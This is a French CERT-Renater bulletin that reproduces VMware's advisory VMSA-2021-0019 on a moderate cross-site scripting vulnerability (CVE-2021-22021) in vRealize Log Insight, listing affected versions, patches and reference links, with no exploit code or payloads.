=====================================================================

                             CERT-Renater

                 Note d'Information No. 2021/VULN425
_____________________________________________________________________

DATE                : 26/08/2021

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running VMware vRealize Log Insight,
                   VMware Cloud Foundation (vRLI) versions prior to 4.3.

=====================================================================
https://www.vmware.com/security/advisories/VMSA-2021-0019.html
_____________________________________________________________________


Moderate


Advisory ID:       VMSA-2021-0019
CVSSv3 Range:      6.5
Issue Date:        2021-08-24
Updated On:        2021-08-24 (Initial Advisory)
CVE(s):            CVE-2021-22021

Synopsis:
VMware vRealize Log Insight updates address Cross Site Scripting (XSS)
vulnerability (CVE-2021-22021)


1. Impacted Products

    VMware vRealize Log Insight
    VMware Cloud Foundation


2. Introduction

A cross-site scripting vulnerability in VMware vRealize Log Insight was
privately reported to VMware. Updates are available to remediate this
vulnerability in affected VMware products.

3. VMware vRealize Log Insight updates address a Cross Site Scripting
(XSS) vulnerability (CVE-2021-22021)

Description

VMware vRealize Log Insight contains a Cross Site Scripting (XSS)
vulnerability due to improper user input validation. VMware has
evaluated the severity of this issue to be in the Moderate severity
range with a maximum CVSSv3 base score of 6.5.

Known Attack Vectors

An attacker with user privileges may be able to inject a malicious
payload via the Log Insight UI which would be executed when the victim
accesses the shared dashboard link.

Resolution

To remediate CVE-2021-22021 apply the patches listed in the 'Fixed
Version' column of the 'Response Matrix' found below.

Workarounds

None.

Additional Documentation

None.

Notes
None.


Acknowledgements

VMware would like to thank Marcin Kot of Prevenity and Tran Viet Quang
of Vantage Point Security for independently reporting this vulnerability
to us.

Response Matrix

Product 	Version 	Running On 	CVE Identifier 	CVSSv3 	Severity 	Fixed
Version 	Workarounds 	Additional Documentation

VMware vRealize Log Insight    8.4    Virtual Appliance    N/A    N/A
N/A    Unaffected     N/A     N/A

VMware vRealize Log Insight    8.3   Virtual Appliance    CVE-2021-22021
6.5    moderate    KB85414    None    None

VMware vRealize Log Insight    8.2   Virtual Appliance    CVE-2021-22021
6.5    moderate    KB85412    None    None

VMware vRealize Log Insight    8.1.1, 8.1.0, 8.0.0 and 4.x
Virtual Appliance    CVE-2021-22021    6.5    moderate    KB85405   None
None


Impacted Product Suites that Deploy Response Matrix Components

Product 	Version 	Running On 	CVE Identifier 	CVSSv3 	Severity 	Fixed
Version 	Workarounds 	Additional Documentation

VMware Cloud Foundation (vRLI)   4.x   Virtual Appliance  CVE-2021-22021
6.5    moderate    4.3    None    None


4. References


Fixed Version(s) and Release Notes:


VMware vRealize Log Insight 8.4.0

Downloads and Documentation:

https://my.vmware.com/en/web/vmware/downloads/details?downloadGroup=VRLI-840&productId=1141&rPId=68060

https://docs.vmware.com/en/vRealize-Log-Insight/8.4/rn/vRealize-Log-Insight-84.html


VMware vRealize Log Insight

8.3: https://kb.vmware.com/s/article/85414
8.2: https://kb.vmware.com/s/article/85412
8.1.1: https://kb.vmware.com/s/article/85405


VMware Cloud Foundation 4.3

Downloads and Documentation:
https://docs.vmware.com/en/VMware-Cloud-Foundation/4.3/rn/VMware-Cloud-Foundation-43-Release-Notes.html


Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22021


FIRST CVSSv3 Calculator:
CVE-2021-22021:
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L


5. Change Log

2021-08-24 VMSA-2021-0019
Initial security advisory.


6. Contact

E-mail list for product security notifications and announcements:
https://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce


This Security Advisory is posted to the following lists:

security-announce@lists.vmware.com
bugtraq@securityfocus.com
fulldisclosure@seclists.org


E-mail: security@vmware.com

PGP key at:
https://kb.vmware.com/kb/1055


VMware Security Advisories
https://www.vmware.com/security/advisories


VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html


VMware Lifecycle Support Phases
https://www.vmware.com/support/policies/lifecycle.html


VMware Security & Compliance Blog
https://blogs.vmware.com/security


Twitter
https://twitter.com/VMwareSRC



Copyright 2021 VMware Inc. All rights reserved.


=========================================================
+ CERT-RENATER       |    tel : 01-53-94-20-44          +
+ 23/25 Rue Daviel   |    fax : 01-53-94-20-41          +
+ 75013 Paris        |    email:cert@support.renater.fr +
=========================================================